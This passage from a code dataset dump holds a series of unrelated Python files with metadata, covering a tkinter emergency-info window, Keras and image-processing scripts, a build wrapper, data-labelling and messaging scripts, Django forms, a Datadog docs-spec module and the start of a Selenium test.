Label(Frame2,text=\"Numéros d'urgence à contacter :\",bg=\"#34d4ff\",font=10,fg=\"red\")\r\ntext_frame2.pack()\r\n\r\nFrame5 = Frame(Frame4)\r\nFrame5.pack()\r\ntext_frame5 = Label(Frame5, text=\"Samu : 15 \\n\\n Pompiers : 18 \\n\\n Police secours : 17 \\n\\n général : 112\", bg=\"#34d4ff\", font=20 )\r\ntext_frame5.pack()\r\n\r\nFrame6 = Frame(Frame8)\r\nFrame6.pack()\r\ntext_frame6 = Label(Frame6, text=\"Conseils en cas d'urgence : \", bg=\"#34d4ff\", font=20, fg=\"red\")\r\ntext_frame6.pack()\r\n\r\nFrame7 = Frame(Frame8)\r\nFrame7.pack()\r\ntext_frame7 = Label(Frame7, text=\"Allonger la personne en position latéral de sécurité. \\n\\n Laisser de l'espace. \\n\\n Ne pas laisser sans surveillance jusqu'à l'arrivé des secours!\", bg=\"#34d4ff\", font=10)\r\ntext_frame7.pack()\r\n\r\ndef retour():\r\n urgence_fenetre.destroy()\r\n import tkinter_interface\r\n\r\nboutonsortie = Button(urgence_fenetre, text=\"Retour\", bg=\"red\",command=retour).pack()\r\n\r\n\r\nurgence_fenetre.mainloop()\r\n","sub_path":"GUI1.py","file_name":"GUI1.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"385469577","text":"import numpy as np\nimport sys \nimport pickle\nfrom keras.models import load_model\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing import sequence\nfrom sklearn.metrics import matthews_corrcoef\nimport keras.backend as K\nfrom sklearn.externals import joblib\n\ntest_path = sys.argv[1] #test_data.csv\noutput_path = sys.argv[2]\n\ndef f1_measure(y_true,y_pred):\n thresh = 0.4\n y_pred = K.cast(K.greater(y_pred,thresh),dtype='float32')\n tp = K.sum(y_true * y_pred,axis=-1)\n \n precision=tp/(K.sum(y_pred,axis=-1)+K.epsilon())\n recall=tp/(K.sum(y_true,axis=-1)+K.epsilon())\n return K.mean(2*((precision*recall)/(precision+recall+K.epsilon())))\n\n\nmodel = load_model('my_model.h5',custom_objects={'f1_measure':f1_measure})\nmodel_1 = load_model('my_model_1.h5',custom_objects={'f1_measure':f1_measure})\nmodel_2 = load_model('my_model_2.h5',custom_objects={'f1_measure':f1_measure})\nmodel_3 = load_model('my_model_3.h5',custom_objects={'f1_measure':f1_measure})\nvectorizer = pickle.load(open('vectorizer.pkl', 'rb'))\nclassif = joblib.load('model_sk.pkl')\n\nmlb = pickle.load(open('mlb.pkl','rb'))\ntokenizer = pickle.load(open('tokenizer.pkl','rb'))\n\nword_index = tokenizer.word_index\n\nf = open(test_path,'r').readlines()\ntxt = []\nbatch_size = 128\nf = f[1:]\n\nprint ('Parse the data')\nfor i in range(len(f)):\n d1 = f[i].find(',')\n txt.append(f[i][d1+1:].strip())\n\ntest_sequences = tokenizer.texts_to_sequences(txt)\nx_test_v = vectorizer.transform(txt)\n\nprint('Pad sequences:')\nx_test = sequence.pad_sequences(test_sequences,maxlen=306) # maxlen being known from hw5_rnn.py\n\nprint ('x_test shape:',x_test.shape)\n\nout_0 = model.predict(x_test,batch_size=batch_size,verbose=1)\nout_1 = model_1.predict(x_test,batch_size=batch_size,verbose=1)\nout_2 = model_2.predict(x_test,batch_size=batch_size,verbose=1)\nout_3 = model_3.predict(x_test,batch_size=batch_size,verbose=1)\n\ny_pred_0 = np.array([[1 if out_0[i,j]>=0.4 else 0\n for j in range(out_0.shape[1])]\n for i in range(out_0.shape[0])]\n )\ny_pred_1 = np.array([[1 if out_1[i,j]>=0.4 else 0\n for j in range(out_1.shape[1])]\n for i in range(out_1.shape[0])]\n )\ny_pred_2 = np.array([[1 if out_2[i,j]>=0.4 else 0\n for j in range(out_2.shape[1])]\n for i in range(out_2.shape[0])]\n )\ny_pred_3 = np.array([[1 if out_3[i,j]>=0.4 else 0\n for j in range(out_3.shape[1])]\n for i in range(out_3.shape[0])]\n )\ny_pred_4 = classif.predict(x_test_v)\n\ny_pred_s = y_pred_0 + y_pred_1 + y_pred_2 + y_pred_3 + y_pred_4\n\ny_pred = np.array([[1 if y_pred_s[i,j]>=3 else 0\n for j in range(y_pred_s.shape[1])]\n for i in range(y_pred_s.shape[0])]\n )\n\nresult = mlb.inverse_transform(y_pred)\n\nof = open(output_path,'w')\nout_txt = '\"id\",\"tags\"\\n'\n\nfor i in range(len(result)):\n out_txt += '\"'+str(i)+'\"'+',\"'\n if (result[i]==()):\n out_txt += 'SPECULATIVE-FICTION' + ' '\n else:\n for te in result[i]:\n out_txt += te + ' '\n out_txt = out_txt[:-1]\n out_txt += '\"\\n'\n\nof. write(out_txt)\nof.close\n","sub_path":"hw5/hw5_test.py","file_name":"hw5_test.py","file_ext":"py","file_size_in_byte":3313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"623382894","text":"import string\n\nimport numpy as np\nfrom keras.utils import to_categorical\nfrom keras_preprocessing.sequence import pad_sequences\n\n\nclass CaptionPreprocessor:\n def __init__(self):\n self.caption_shape = [0]\n\n self.EXTRA_PADDING = 10\n self.PAD_TOKEN = \"<0>\"\n self.SOS_TOKEN = \"\"\n self.EOS_TOKEN = \"\"\n\n self.word2index = {}\n self.word2count = {}\n self.index2word = {}\n\n self.max_index = 0\n self.add_word(self.PAD_TOKEN)\n self.add_word(self.SOS_TOKEN)\n self.add_word(self.EOS_TOKEN)\n self.translate_map = dict((ord(c), \" \") for c in string.punctuation)\n\n def add_word(self, word):\n if word not in self.word2index:\n self.word2index[word] = self.max_index\n self.word2count[word] = 1\n self.index2word[self.max_index] = word\n self.max_index += 1\n else:\n self.word2count[word] += 1\n\n def add_caption(self, caption):\n caption = caption.translate(self.translate_map).lower().split()\n\n if self.caption_shape[0] < len(caption) + self.EXTRA_PADDING:\n self.caption_shape = [len(caption) + self.EXTRA_PADDING]\n\n for word in caption:\n self.add_word(word)\n\n def add_captions(self, captions):\n for caption in captions:\n self.add_caption(caption)\n\n def encode_word(self, word):\n encoded_word = self.word2index.get(word, None)\n\n return encoded_word\n\n def encode_caption(self, caption):\n caption = caption.translate(self.translate_map).lower().split()\n\n encoded_caption = []\n encoded_caption.append(self.encode_word(self.SOS_TOKEN))\n\n for word in caption:\n encoded_word = self.encode_word(word)\n if encoded_word is not None:\n encoded_caption.append(encoded_word)\n\n encoded_caption.append(self.encode_word(self.EOS_TOKEN))\n\n return encoded_caption\n\n def encode_captions(self, captions, padding_length):\n encoded_captions = []\n for caption in captions:\n encoded_captions.append(self.encode_caption(caption))\n\n encoded_captions = pad_sequences(encoded_captions, padding=\"post\", maxlen=padding_length)\n\n return encoded_captions\n\n def decode_word(self, encoded_word):\n pass\n\n def decode_caption(self, encoded_caption):\n pass\n\n def decode_captions(self, encoded_captions):\n pass\n\n def preprocess(self, captions):\n encoded_captions = self.encode_captions(captions, self.caption_shape[0])\n\n return encoded_captions\n\n def preprocess_one_hot(self, captions):\n # label padding of caption_len + 1 since we get X * captions + 1 * image embedding\n encoded_captions = self.encode_captions(captions, self.caption_shape[0] + 1)\n encoded_captions = to_categorical(encoded_captions, self.max_index)\n\n return encoded_captions\n","sub_path":"src/caption_preprocessor.py","file_name":"caption_preprocessor.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"56796708","text":"import os\nimport sys\nimport logging\nimport subprocess\nimport platform\nimport multiprocessing\n\n\nfrom gii.core import Project, app\n\n# WAF_NAME = 'waf-1.9.7'\nWAF_NAME = 'waf-2.0.19'\n\ndef run( **option ):\n\tFNULL = open(os.devnull, 'wb')\n\tproject = app.getProject()\n\tassert project.isLoaded()\n\tos.chdir( project.getHostPath() )\n\t# if option.get( 'clean-bin', False ):\n\t# \tif sys.platform == 'darwin':\n\t# \t\tpass\t\n\t# \telse:\n\t# \t\tpass\n\t# \t\t#TODO\t\n\t# \treturn 0\n\tbuildEnv = os.environ.copy()\n\tglobalBuildEnv = app.getUserSetting( 'build_env', None )\n\tif globalBuildEnv:\n\t\tfor k, v in globalBuildEnv.items():\n\t\t\tbuildEnv[ k ] = v\n\tprojectBuildEnv = project.getUserSetting( 'build_env', None )\n\tif projectBuildEnv:\n\t\tfor k, v in projectBuildEnv.items():\n\t\t\tbuildEnv[ k ] = v\n\n\tbuildEnv[ 'JOBS' ] = '8'\n\tWAFCmd = [ app.getPythonPath(), app.getPath( 'support/common/%s/waf' % WAF_NAME ) ]\n\tdef callWAF( cmd, *args, **kwargs ):\n\t\tkwargs[ \"env\" ] = buildEnv\n\t\tif isinstance( cmd, list ):\n\t\t\targlist = WAFCmd + cmd + list( args )\n\t\telse:\n\t\t\targlist = WAFCmd + [ cmd ] + list( args )\n\t\treturn subprocess.call( arglist, **kwargs )\n\n\t#check configure\n\t# code = callWAF( 'list', stdout = FNULL, stderr = FNULL )\n\t# if code != 0:\n\t# \tcode = callWAF( 'configure' )\n\t# \tif code != 0:\n\t# \t\tlogging.error( 'cannot configure building ' )\n\t# \t\treturn -1\n\n\t#main body\n\tbuilding = True\n\tcmds = []\n\targs = []\n\t\n\t#misc settings\n\tif option.get( 'verbose', False ):\n\t\targs.append( '-v' )\n\n\targs.append( '-j%d' % max( 2, multiprocessing.cpu_count()) )\n\t#configure\n\tif option.get( 'configure', False ):\n\t\treturn callWAF( 'configure', *args )\n\n\t#commands\n\tif option.get( 'clean', False ):\n\t\tcmds += [ 'clean' ]\n\n\tif option.get( 'dist', False ):\n\t\tcmds += [ 'dist' ]\n\n\tif option.get( 'project', False ):\n\t\tcmds += [ 'project' ]\n\n\telse:\n\t\tif option.get( 'build', True ):\n\t\t\tcmds += [ 'build' ]\n\n\t\tif option.get( 'install', True ):\n\t\t\tcmds += [ 'install' ]\n\n\n\ttargets = option.get( 'targets', [ 'host' ] )\t\t\n\n\tif isinstance( targets, str ):\n\t\ttargets = [ targets ]\n\n\t#expand native\n\tif 'host' in targets:\n\t\ttargets.remove( 'host' )\n\t\tif platform.system() == 'Darwin':\n\t\t\tif not ( 'osx' in targets ):\n\t\t\t\ttargets.append( 'osx' )\n\t\t\t\t\n\t\telif platform.system() == 'Windows':\n\t\t\tif not ( 'win' in targets ):\n\t\t\t\ttargets.append( 'win' )\n\n\t\telif platform.system() == 'Linux':\n\t\t\tif not ( 'linux' in targets ):\n\t\t\t\ttargets.append( 'linux' )\n\n\tif 'native' in targets:\n\t\ttargets.remove( 'native' )\n\t\tif platform.system() == 'Darwin':\n\t\t\tif not ( 'osx' in targets ):\n\t\t\t\ttargets.append( 'osx' )\n\t\t\tif not ( 'python' in targets ):\n\t\t\t\ttargets.append( 'python' )\n\t\t\t\t\n\t\telif platform.system() == 'Windows':\n\t\t\tif not ( 'win' in targets ):\n\t\t\t\ttargets.append( 'win' )\n\t\t\tif not ( 'python' in targets ):\n\t\t\t\ttargets.append( 'python' )\n\n\t\telif platform.system() == 'Linux':\n\t\t\tif not ( 'linux' in targets ):\n\t\t\t\ttargets.append( 'linux' )\n\n\tbuild_type = option.get( 'build_type', 'debug' )\n\n\tcmdList = []\n\tfor target in targets:\n\t\tcontextName = '%s-%s' % ( target, build_type )\n\t\tsuffix = '-' + contextName\n\t\tfor cmd in cmds:\n\t\t\tcmdList += [ cmd + suffix ]\n\tprint( cmdList )\n\treturn callWAF( cmdList, *args )\n","sub_path":"lib/gii/core/tools/Build.py","file_name":"Build.py","file_ext":"py","file_size_in_byte":3153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"372972287","text":"#!/usr/bin/env python3\nimport cv2\nimport numpy as np\n\ndef draw_circles(img, n=15):\n \n # declare parameters\n wv = 405; # laser wavelength (nm)\n pixel_size = 0.5;\n fs = 1/pixel_size;\n \n # size of imaging plane in image and frequency domain\n nx, ny = np.shape(img);\n low = -fs/2;\n highx = fs/2 * ((nx-2)/nx) ;\n highy = fs/2 * ((ny-2)/ny) ;\n \n # circle positioning and sizing\n x = np.random.choice(nx, n).reshape((n, 1));\n y = np.random.choice(ny, n).reshape((n, 1));\n r = np.random.uniform(0.8, 1.5, n).reshape((n, 1));\n \n # phase shift\n phase = np.random.uniform(0.25, 0.75, n) / (2*np.pi);\n phase = phase.reshape((n, 1));\n \n # complex optical wavefront I(x,y)\n M = np.concatenate((x, y, np.round(r / pixel_size).astype(int), phase), axis=1);\n M = np.concatenate((M, np.exp(M[:,2] * 2j * np.pi).reshape(n, 1)), axis=1);\n \n # draw circles\n for i in range(n):\n cv2.circle(img, (int(y[i]), int(x[i])), radius=int((np.round(r[i] / pixel_size))), color=255, thickness=-1);\n img[img == 0] = 1;\n\n # fourier transform\n ft = np.fft.fftshift(np.fft.fft2(np.fft.ifftshift(img)));\n ft2 = np.fft.fft2(img);\n \n print(np.log10(abs(ft)).shape, np.max(np.log10(abs(ft))), np.min(np.log10(abs(ft))));\n \n # fourier output for return\n fourierimg = (np.log10(abs(ft)) - np.min(np.log10(abs(ft))))/(np.max(np.log10(abs(ft))) - np.min(np.log10(abs(ft)))) * 255\n fourierimg2 = (np.log10(abs(ft2)) - np.min(np.log10(abs(ft2))))/(np.max(np.log10(abs(ft2))) - np.min(np.log10(abs(ft2)))) * 255\n # -------------------------------------\n\n # frequency coordinates\n kx = np.linspace(low,highx,nx)\n ky = np.linspace(low,highy,ny)\n \n # z distance sampling\n z_0 = np.random.uniform(800,2400);\n \n # transfer function\n trans = np.exp(z_0*1j*np.sqrt((2*np.pi*wv)**2 - kx**2 - ky**2))\n \n # intensity @ image sensor (convolution)\n I = trans * ft;\n I2 = trans * ft2;\n\n # inverse fourier to get image\n ift = np.fft.ifftshift(np.fft.ifft2(np.fft.fftshift(I)));\n ift2 = np.fft.ifft2(I2);\n \n # image sensor output (I_z0(x,y))\n Iimg = (np.log10(abs(ift)) - np.min(np.log10(abs(ift))))/(np.max(np.log10(abs(ift))) - np.min(np.log10(abs(ift)))) * 255\n Iimg2 = (np.log10(abs(ift2)) - np.min(np.log10(abs(ift2))))/(np.max(np.log10(abs(ift2))) - np.min(np.log10(abs(ift2)))) * 255 \n # generate noise: N(0,[0.0125,0.03125])\n noise = np.random.normal(0,np.random.uniform(0.0125, 0.03125, 1), (nx, ny)) * 255\n \n # final image sensory output + noise (H(x,y))\n H = np.abs(Iimg) + noise\n H2 = np.abs(Iimg2) + noise\n \n return img, fourierimg, fourierimg2, H, H2;\n\ndef main():\n img = np.zeros((1000, 1000));\n cv2.imwrite('base.png', img);\n img = cv2.imread('base.png', cv2.IMREAD_COLOR);\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) / 255.0\n\n img, fourier, fourier2, H, H2 = draw_circles(img)\n \n img = cv2.imwrite('circles_drawn.png', img);\n fourier = cv2.imwrite('fourier.png', fourier)\n fourier2 = cv2.imwrite('fourier2.png', fourier2)\n H = cv2.imwrite('image.png', H)\n H2 = cv2.imwrite('image2.png', H2)\n \nmain();","sub_path":"initial-attempts/.ipynb_checkpoints/circledrawHaHa-checkpoint.py","file_name":"circledrawHaHa-checkpoint.py","file_ext":"py","file_size_in_byte":3200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"145252793","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 12 14:37:02 2020\n\n@author: shruti\n\"\"\"\n\nfrom am_analysis import am_analysis as ama\nimport numpy as np\nimport matplotlib.pyplot as plt \n#put breathing data here as a numpy array\nimport pandas as pd\nfrom scipy import signal\n\n\n# label = pd.read_csv('/home/shruti/Downloads/Master_list.csv', header=0)\n# l = np.array(label)\n# print(l.shape[0])\n# l1 = l[:,3]\n# l2 = l[:,9]\n\n# for i in range(x.shape[0]):\n# #print(X[i])\n# if l1[i]>0.45 or l2[i]==Day shift:\n\nimport os\nimport pandas as pd\n#output_fin=np.empty((0,12))\noutput_cols=['bnd_pwr_0_25','bnd_pwr_25_50','bnd_pwr_50_150','entropy','p1_p2','p1_p3','kurt','sknew','flatness','peak_f','ratio_25', 'ratio_50','ratio_150','perm_ent', 'filename', 'labels']\n#load master list data\ninfo_csv='/home/shruti/Downloads/Master_list.csv'\ndf_info=pd.read_csv(info_csv)[['participant_id','Shift Info','sex']]\npath = '/media/shruti/Data/Breathing_project/mask/mask_3_019/'\nif not os.path.exists(path):\n os.makedirs(path)\n#iterate over dataframes\nfor idx,row in df_info.iterrows():\n\t#get a subject , its shift and sex information\n sub_nm,shift,sex=str(row['participant_id']),str(row['Shift Info']),str(row['sex'])\n print(sub_nm,shift,sex)\n file_path='/media/shruti/Data/Breathing_project/Tiles/br_fts/'+sub_nm+'.csv'\n print('name',file_path)\n \n # df_br=pd.read_csv(file_path)\n try:\n x = pd.read_csv(file_path)\n cols=x.columns.values.tolist()\n print(cols)\n except:\n continue\n # x = np.array(x)\n # print(x.shape)\n X1 = x['bnd_pwr_25_50']\n X1 = np.array(X1)\n X1 = X1[:,None]\n print(X1.shape)\n X2 = x['peak_f']\n X2 = np.array(X2)\n X2 = X2[:,None]\n print(X2.shape)\n X3 = x[ 'entropy']\n X3 = np.array(X3)\n X3 = X3[:,None]\n print(X3.shape)\n X4 = x[ 'bnd_pwr_0_25']\n X4 = np.array(X4)\n X4 = X4[:,None]\n print(X4.shape)\n x_new = np.array(x)\n print(x_new.shape[0])\n # X = x['':, 1'']\n # X = X.squeeze()\n # X = X[:, None]\n # #print(X.shape[0])\n # X2 = x[:, -6]\n # X2= X2.squeeze()\n # X2 = X2[:, None]\n # X3 = x[:, 3]\n # X3 = X.squeeze()\n # X3 = X[:, None]\n \n Y_test =[]\n \n for i in range(x_new.shape[0]):\n \n # if X1[i]>0.45 and X2[i]>0.25 and X3[i]<1.7:\n #if X1[i]>0.45:\n #if X2[i]>0.25:\n # if X3[i]<1.7:\n if X1[i]>0.55 and X2[i]>0.25 and X4[i]<0.2:\n #if X2[i]>0.25:\n Y_test.append(0)\n else:\n Y_test.append(1)\n \n \n Y = np.asarray(Y_test)\n Y = Y[:, None]\n print('labels', Y.shape)\n out_vec=np.hstack((x_new, Y))\n print(out_vec.shape)\n df=pd.DataFrame(out_vec, columns=output_cols)\n df.to_csv(path+sub_nm+'.csv' ,index=None)\n\n","sub_path":"mask_PSD.py","file_name":"mask_PSD.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"201458132","text":"# reading the file \n\nmy_file = open(\"zoo.csv\",\"rt\")\n\n# reading the content of zoo.csv file \nread_files = my_file.readlines()\n\n# printing the file content in vertically\nfor i in read_files:\n new_file= list(i.split(\",\"))\n if new_file[0]==\"elephant\":\n sec_new= new_file[2]\n print (sec_new.split()) \n\n# closing the file\nmy_file.close()\n\n\n\n","sub_path":"day_2/printing_zoo_file_through_python.py","file_name":"printing_zoo_file_through_python.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"298034927","text":"import numpy as np\r\nimport cv2\r\nfrom matplotlib import pyplot as plt\r\n\r\nimg = cv2.imread(\"flower.png\")\r\n\r\n#converting from bgr to L*a*b*\r\nhs = cv2.cvtColor(img, cv2.COLOR_BGR2Lab)\r\n#split the image into planes\r\nL,a,b = cv2.split(hs)\r\n\r\n#create a copy of each L,a,b numpy arrays\r\nL1 = np.copy(L)\r\na1 = np.copy(a)\r\nb1 = np.copy(b)\r\n\r\n#fill the L,a,b copy values to constant for displaying in color format\r\nL1.fill(127)\r\na1.fill(128)\r\nb1.fill(128)\r\nLt = cv2.cvtColor(cv2.merge([L,a1,b1]), cv2.COLOR_Lab2RGB)\r\n\r\n#display the images in RGB form as matplotlib requires images in RGB\r\nplt.figure(1)\r\nplt.subplot(221)\r\nplt.imshow(cv2.cvtColor(img,cv2.COLOR_BGR2RGB))\r\nplt.title('original')\r\nplt.subplot(222)\r\nplt.imshow(Lt)\r\nplt.title('L*')\r\nplt.subplot(223)\r\nplt.imshow(cv2.cvtColor(cv2.merge([L1,a,b1]), cv2.COLOR_Lab2RGB))\r\nplt.title('a*')\r\nplt.subplot(224)\r\nplt.imshow(cv2.cvtColor(cv2.merge([L1,a1,b]), cv2.COLOR_Lab2RGB))\r\nplt.title('b*')\r\nplt.show()\r\n","sub_path":"assignment 1/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"346726704","text":"from influxdb import InfluxDBClient\nimport pika\nimport sys\nimport json\nimport time\n\n\n# declarations--------------------\nclient = InfluxDBClient(host='localhost', port=8086)\nclient.create_database('ftest')\nclient.switch_database('ftest')\n#client.create_retention_policy('onehr','1h',1, default=True)\n#run one time only\n#client.query(\"CREATE CONTINUOUS QUERY maxtemp_cq ON ftest RESAMPLE EVERY 10s BEGIN SELECT max(temp) as temp, x_axis, y_axis, z_axis, carId INTO ftest.onehr.newcar FROM ftest.oneday.car GROUP BY time(30s) END\")\n\n#def send_data_to_server(data):\ncred=pika.PlainCredentials('admin', 'password')\nconnection = pika.BlockingConnection(pika.ConnectionParameters(host='HOST IP',credentials=cred))\nprint(\"connection-\",connection)\nchannel = connection.channel()\nchannel.queue_declare(queue='local_queue', durable=True)\n\n\n\n# code----------------------------\n\ndef read_from_db():\n print(\"----------------------\\nin read from db\")\n client.switch_database('ftest')\n client.query(\"alter retention policy onehr on ftest duration 1h replication 1 default\")\n rs = client.query(\"SELECT * from newcar\")\n #print(\"\\n\\nrs----\",rs,\"\\n\\n\")\n points =list(rs.get_points(measurement='newcar', tags={'carId': '123456'}))\n top_item=(len(points)-1)\n print(\"\\npoints od top---->\",points[top_item])\n #print(\"type\",type(points[0])) #should be dict\n carId=points[top_item]['carId']\n temp=points[top_item]['temp']\n Xaxis=points[top_item]['x_axis']\n Yaxis=points[top_item]['y_axis']\n Zaxis=points[top_item]['z_axis']\n json_send={\n \"measurement\":\"car\",\n \"tags\":{\n \"carId\":carId\n },\n \"fields\":{\n \"temp\":float(temp),\n \"x_axis\":int(Xaxis),\n \"y_axis\":int(Yaxis),\n \"z_axis\":int(Zaxis)\n }\n }\n print(\"return from influx-\",json_send)\n return(json_send)\n\n\ndef send_data_to_server(data):\n print(\"\\nsend_data_to_server\",data)\n res=channel.basic_publish(exchange='',\n routing_key='local_queue',\n #data should be of dict type\n body=json.dumps(data),\n properties=pika.BasicProperties(\n delivery_mode = 2, # make message persistent\n ))\n print(res)\n\n#connection.close()\n#send_data_to_server(\"hey\")\n\n\n\nwhile True:\n time.sleep(10)\n data = read_from_db()\n print(\"\\nread from db-\\n\", data)\n send_data_to_server(data)\n\n","sub_path":"Raspberry-Pi/DBtoServer.py","file_name":"DBtoServer.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"653335405","text":"from django import forms\nfrom django.contrib.auth.forms import UserCreationForm\n\nfrom .models import UploadFile, User\n\n\nclass FileUploadModelForm(forms.ModelForm):\n class Meta:\n model = UploadFile\n fields = ('uploadFile', 'uploadUrl', 'uploadOperator')\n widgets = {\n 'uploadUrl': forms.TextInput(attrs={'class': 'form-control'}),\n 'uploadOperator': forms.TextInput(attrs={'class': 'form-control'}),\n 'uploadFile': forms.ClearableFileInput(attrs={'class': 'form-control'}),\n }\n\n def clean(self):\n file = super().clean().get('uploadFile')\n ext = file.name.split('.')[-1].lower()\n\n if ext not in [\"txt\", \"csv\", \"xlsx\"]:\n raise forms.ValidationError(\"只允许上传以下格式文件:txt, csv and xlsx。\")\n # return cleaned data is very important.\n return super().clean()\n\n\nclass RegisterForm(UserCreationForm):\n class Meta(UserCreationForm.Meta):\n model = User\n fields = (\"username\", \"nick_name\", \"email\")\n","sub_path":"databaseDemo/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"224232214","text":"# coding=utf-8\n# Time: 2019-10-21-16:58 \n# Author: dongshichao\n\n'''\n我们称一个数 X 为好数, 如果它的每位数字逐个地被旋转 180 度后,我们仍可以得到一个有效的,且和 X 不同的数。要求每位数字都要被旋转。\n\n如果一个数的每位数字被旋转以后仍然还是一个数字, 则这个数是有效的。0, 1, 和 8 被旋转后仍然是它们自己;\n2 和 5 可以互相旋转成对方;6 和 9 同理,除了这些以外其他的数字旋转以后都不再是有效的数字。\n\n现在我们有一个正整数 N, 计算从 1 到 N 中有多少个数 X 是好数?\n注意 1 和 10 不是好数, 因为他们在旋转之后不变。\n\n示例:\n输入: 10\n输出: 4\n解释:\n在[1, 10]中有四个好数: 2, 5, 6, 9。\n注意 1 和 10 不是好数, 因为他们在旋转之后不变。\n\n思路:\n好数必须包含 2 5 6 9 组成\n且不能包含 3 4 7\n'''\n\nclass Solution(object):\n def rotatedDigits(self, N):\n \"\"\"\n :type N: int\n :rtype: int\n \"\"\"\n res = 0\n for i in range(N+1):\n s = str(i)\n if (\"3\" not in s and '4' not in s and '7' not in s)and ('2' in s or '5'in s or '6' in s or '9' in s):\n res +=1\n return res\n\n\n","sub_path":"string/rotatedDigits.py","file_name":"rotatedDigits.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"280169006","text":"# (C) Datadog, Inc. 2020-present\n# All rights reserved\n# Licensed under a 3-clause BSD style license (see LICENSE)\n\nimport re\nfrom collections import deque\n\nimport markdown\nfrom markdown.blockprocessors import ReferenceProcessor\n\nfrom ....utils import get_parent_dir, path_join\nfrom ..core import BaseSpec\nfrom ..templates import BaseTemplate\nfrom .spec import spec_validator\n\n# Match markdown reference links - [text][number-ref]\n# the `?` after `[\\s\\S]+` will match lazily vs greedily\nMATCH_REF = re.compile(r\"(\\[[\\s\\S]+?\\])\\s*(\\[\\d+\\])\")\n\n\nclass DocsTemplates(BaseTemplate):\n TEMPLATES_DIR = path_join(get_parent_dir(get_parent_dir(get_parent_dir(__file__))), 'templates', 'docs')\n\n\nclass DocsSpec(BaseSpec):\n def __init__(self, contents, template_paths=None, source=None, version=None):\n super().__init__(contents, template_paths, source, version)\n\n self.spec_type = 'Docs'\n self.templates = DocsTemplates(template_paths)\n\n def validate(self):\n spec_validator(self.data, self)\n if self.errors:\n return\n self.normalize_links()\n\n def normalize_links(self):\n \"\"\"Translate all reference-style links to inline links.\"\"\"\n # Markdown doc reference: https://www.markdownguide.org/basic-syntax/#links\n\n for fidx, file in enumerate(self.data['files'], 1):\n sections = deque(enumerate(file['sections'], 1))\n while sections:\n sidx, section = sections.popleft()\n section['prepend_text'] = self._normalize(section['prepend_text'], fidx, sidx)\n section['description'] = self._normalize(section['description'], fidx, sidx)\n section['append_text'] = self._normalize(section['append_text'], fidx, sidx)\n if 'sections' in section:\n nested_sections = [\n (f'{sidx}.{subidx}', subsection) for subidx, subsection in enumerate(section['sections'], 1)\n ]\n # extend left backwards for correct order of sections\n sections.extendleft(nested_sections[::-1])\n\n def _normalize(self, text, fidx, sidx):\n # use the markdown internal processor class to extract all references into a dict\n m = markdown.Markdown()\n\n def process_references(txt):\n blocks = [txt]\n while ReferenceProcessor(m.parser).run(None, blocks):\n blocks = ['\\n'.join(blocks)]\n return blocks[0], m.parser.md.references\n\n p, refs = process_references(text)\n\n # test that we extracted appropriately\n matches = MATCH_REF.findall(p)\n if len(matches) != len(refs):\n # attach validation error\n err = (\n f'In file #{fidx}, section #{sidx}: found {len(matches)} reference links, '\n f'but extracted {len(refs)} references.'\n )\n self.errors.append(err)\n return text\n\n # Translate refs to text that is directly replacable\n # {'1': ('https://datadoghq.com', None),\n # '2': ('https://google.com', \"Google Link\")}\n\n # To:\n # {'[1]': '(https://datadoghq.com)',\n # '[2]': '(https://google.com \"Google Link\")'}\n inline_links = {}\n for k, v in refs.items():\n link = v[0]\n if v[1] is not None:\n link += f'\"{v[1]}\"'\n inline_links[f'[{k}]'] = f'({link})'\n\n inline_md = MATCH_REF.sub(lambda x: '{}{}'.format(x.group(1), inline_links[x.group(2)]), p)\n return inline_md\n","sub_path":"datadog_checks_dev/datadog_checks/dev/tooling/specs/docs/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"56796674","text":"# -*- coding:utf-8 -*-\nimport time\nimport unittest\nimport datetime\nfrom AutoFramework.testobject.comm_obj import NavigateObj, LoginOutObj\nfrom AutoFramework.utils.configReader import YamlReader, getDriver\nfrom AutoFramework.testobject.module_dataFill_overall_obj import Moudle_dataFill_overall_hotel_monthFill\n\n\nclass Test_overall_hotel_monthFill(unittest.TestCase):\n \"\"\"\n 酒店月填报-填报功能验证\n \"\"\"\n\n def setUp(self):\n self.d = getDriver()\n self.d.get(YamlReader().data['global']['corp']['url'])\n self.login = LoginOutObj(self.d)\n self.mdObj = Moudle_dataFill_overall_hotel_monthFill(self.d)\n self.naviObj = NavigateObj(self.d)\n self.login.Login(YamlReader().data['global']['corp']['user'], YamlReader().data['global']['corp']['pass'])\n\n def Test_overall_hotel_dailyFill(self):\n \"\"\"\n 酒店月填报-填报功能验证\n \"\"\"\n # 点击数据管理\n self.naviObj.click_dataManagement()\n # 点击数据填报\n self.naviObj.click_dataFill()\n # 点击综合产业\n self.naviObj.click_overall()\n # 点击填报\n self.naviObj.click_dataFill_overall_fill()\n # 点击酒店月填报\n 